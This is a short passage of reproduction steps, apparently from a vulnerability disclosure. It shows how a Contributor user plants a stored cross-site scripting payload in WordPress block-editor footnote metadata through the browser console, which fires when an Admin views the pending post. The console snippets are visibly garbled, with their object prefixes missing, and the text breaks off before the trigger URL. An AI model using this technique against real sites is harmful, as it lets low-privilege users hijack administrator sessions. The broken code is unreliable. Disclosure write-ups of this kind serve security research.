1. Create a new post as a Contributor user.
2. Add a paragraph block and add a footnote to the paragraph.
3. Open the developer console and execute the following code:'core/editor').getEditedPostAttribute('meta');

You will see something like the following. Take note of the id.

{ footnotes: "[{\"content\":\"uuuuu\",\"id\":\"969d913a-9844-405e-8647-570d675fbeb6\"}]" }

4. Execute the following code on the console, using the id gathered above:'core/editor').editPost({meta:{'core/editor').getEditedPostAttribute('meta'), footnotes:'[{\"content\":\"uuuuu<script>alert(\'ok\');</script>\",\"id\":\"969d913a-9844-405e-8647-570d675fbeb6\"}]'}});

5. As an Admin user, view the pending post at the following URL to trigger the XSS (filling in SITE_URL and POST_ID):